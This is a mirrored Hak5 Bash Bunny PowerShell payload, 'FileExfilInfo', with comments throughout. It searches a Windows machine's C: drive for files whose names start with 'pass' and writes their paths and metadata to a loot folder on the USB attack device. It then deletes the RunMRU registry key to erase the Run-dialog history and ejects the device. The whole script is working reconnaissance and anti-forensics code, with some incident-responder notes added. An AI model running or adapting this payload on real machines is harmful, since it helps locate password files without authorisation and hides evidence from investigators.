mirror of
https://github.com/hak5/bashbunny-payloads.git
synced 2025-10-29 16:58:25 +00:00
#Creator: A_SarcasticGuy
#Title: FileExfilInfo
#Target: Windows
#
# Summary: locates the volume labelled BASHBUNNY, lists metadata for every
# file or directory under C:\ whose name starts with "pass", and appends that
# listing to a per-host text file on the device. Only the fields echoed by
# forfiles are recorded; this script does not copy file contents.

# Read the current CapsLock state; it gates the toggle below.
$capsLockOn = [System.Windows.Forms.Control]::IsKeyLocked('CapsLock')

# If CapsLock is on, send one synthetic CapsLock keypress through
# WScript.Shell to switch it off (the author's stated reason: so the script
# doesn't fail).
if ($capsLockOn) {
    $wshShell = New-Object -ComObject WScript.Shell
    $wshShell.SendKeys('{CapsLock}')
}

# Resolve the root path of the volume whose label is BASHBUNNY via WMI.
$bunnyRoot = (Get-WmiObject -Class win32_volume -Filter 'label=''BASHBUNNY''').Name

# Per-host output folder on the device: <root>\loot\Exfil\<COMPUTERNAME>.
$lootDir = "$bunnyRoot\loot\Exfil\$env:computername"
mkdir $lootDir

# Recursive walk of C:\ for names matching "pass*" ("pass*" and "C:\" are the
# author's defaults). For each match forfiles echoes: is-directory flag, date,
# time, full path and size. Output is appended to a timestamp-named .txt file
# in the per-host folder.
# Responder note: forfiles.exe started from PowerShell with /s over C:\, plus
# writes to a removable volume, are the observable traces of this step.
forfiles /P "C:\" /s /m "pass*" -c "cmd /c echo @isdir @fdate @ftime @path @fsize" >> "$lootDir\$(Get-Date -Format dd-MM-yyy-hh-mm-ss).txt"

# Deletes the current user's RunMRU key, which holds the Run dialog history.
# Responder note: where process-creation logging is enabled, a reg.exe
# "delete ... RunMRU /f" command line is a trace of this clean-up step, and a
# missing RunMRU key is itself worth noting during triage.
REG delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f

# Fixed 10-second pause before the eject attempt.
Start-Sleep -Seconds 10

# Eject the device once the listing is done (search time can vary).
# NameSpace(17) is the shell's drives folder; the device is looked up there by
# its root path and the "Eject" verb is invoked on it.
$shellApp = New-Object -ComObject Shell.Application
$drivesFolder = $shellApp.NameSpace(17)
$bunnyItem = $drivesFolder.ParseName($bunnyRoot)
$bunnyItem.InvokeVerb("Eject")

# N.B. The device will not eject while it is still in use, and a scan can take
# a long time, for example when it covers a full hard disk.

# Ask the PowerShell host to exit with code 0 in case the process is still open.
$host.SetShouldExit(0)